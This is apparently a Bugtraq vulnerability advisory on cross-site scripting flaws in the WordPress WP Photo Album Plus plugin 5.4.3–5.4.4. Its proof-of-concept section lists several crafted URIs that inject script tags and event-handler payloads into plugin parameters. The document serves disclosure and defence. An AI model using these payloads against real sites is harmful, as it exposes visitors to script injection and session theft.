WordPress Photo Album Plus Plugin Multiple Cross Site Scripting Vulnerabilities
BID:69786
Info
WordPress Photo Album Plus Plugin Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 69786 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 12 2014 12:00AM |
| Updated: | Sep 12 2014 12:00AM |
| Credit: | Milhouse |
| Vulnerable: |
WordPress WP Photo Album Plus 5.4.4 WordPress WP Photo Album Plus 5.4.3 |
| Not Vulnerable: | |
Exploit / POC
WordPress Photo Album Plus Plugin Multiple Cross Site Scripting Vulnerabilities
To exploit these issues, an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/?page_id=109&wppa- album=0178d4<%2fscript><script>alert(1)<%2fscript>75f6e&wppa-cover=0&wppa- occur=1&wppa-tag=
http://www.example.com/?wppa-occur=1&wppa- lasten=102dbdd"%20onmouseover%3dalert(1)%20fd679&page_id=10&wppa- album=0&wppa-photo=2
http://www.example.com/?page_id=110&wppa-search-submit=wppa-search- submit%3dSearch&wppa- searchstring=cd84d"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert (1)"3b512b44ea8&wppa-searchroot=
http://www.example.com/?wppa-occur=1&wppa- topten=10eb700"%20onmouseover%3dalert(1)%203c53f&&page_id=12&wppa- album=0&wppa-photo=2
http://www.example.com/?s=7d0ba"style%3d"behavior%3aurl(%23default%23time2 )"onbegin%3d"alert(1)"3924b
To exploit these issues, an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/?page_id=109&wppa- album=0178d4<%2fscript><script>alert(1)<%2fscript>75f6e&wppa-cover=0&wppa- occur=1&wppa-tag=
http://www.example.com/?wppa-occur=1&wppa- lasten=102dbdd"%20onmouseover%3dalert(1)%20fd679&page_id=10&wppa- album=0&wppa-photo=2
http://www.example.com/?page_id=110&wppa-search-submit=wppa-search- submit%3dSearch&wppa- searchstring=cd84d"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert (1)"3b512b44ea8&wppa-searchroot=
http://www.example.com/?wppa-occur=1&wppa- topten=10eb700"%20onmouseover%3dalert(1)%203c53f&&page_id=12&wppa- album=0&wppa-photo=2
http://www.example.com/?s=7d0ba"style%3d"behavior%3aurl(%23default%23time2 )"onbegin%3d"alert(1)"3924b
Solution / Fix
WordPress Photo Album Plus Plugin Multiple Cross Site Scripting Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
WordPress Photo Album Plus Plugin Multiple Cross Site Scripting Vulnerabilities
References:
References:
- WordPress HomePage (WordPress)
- WP Photo Album Plus Plugin Homepage (WordPress)